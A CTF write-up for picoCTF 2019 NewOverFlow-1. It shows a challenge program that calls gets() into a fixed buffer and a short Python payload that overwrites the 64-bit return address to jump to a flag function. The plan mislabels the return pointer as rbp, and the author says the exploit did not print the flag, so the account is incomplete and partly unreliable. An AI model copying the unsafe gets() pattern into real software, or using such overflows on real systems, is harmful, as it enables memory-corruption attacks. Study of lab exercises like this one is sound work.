picoCTF 2019 - NewOverFlow-1 writeup

07 Nov, 2020

Description

Lets try moving to 64-bit, but don’t worry we’ll start easy. Overflow the buffer and change the return address to the flag function in this program.

Category: Binary Exploitation

Points: 200

Source Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFFSIZE 64
#define FLAGSIZE 64

void flag() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("'flag.txt' missing in the current directory!\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFFSIZE];
  gets(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
  vuln();
  return 0;
}

Explanation

This is similar to the OverFlow 1 challenge solved previously. We need to modify the return address to point to the flag function. The main different is that this code uses 64-bit instead of 32-bit. Meaning the registers are 8 bytes instead of 4.

Plan

Fill the buffer and overwrite the base pointer (rbp)
Modify the return pointer (rbp) to point to the flag function

Exploit

My python code:

import struct

padding = "A" * 72
rip = struct.pack("Q", 0x400767)    # addr of flag() function

print padding + rip

The exploit successfully changes the return address to the start of the flag function. However, instead of printing the flag, I get the following message:

'flag.txt' missing in the current directory!

This is strange because flag.txt does exist in the directory. Idk if this is a problem with the challenge. If anyone has a fix please let me know!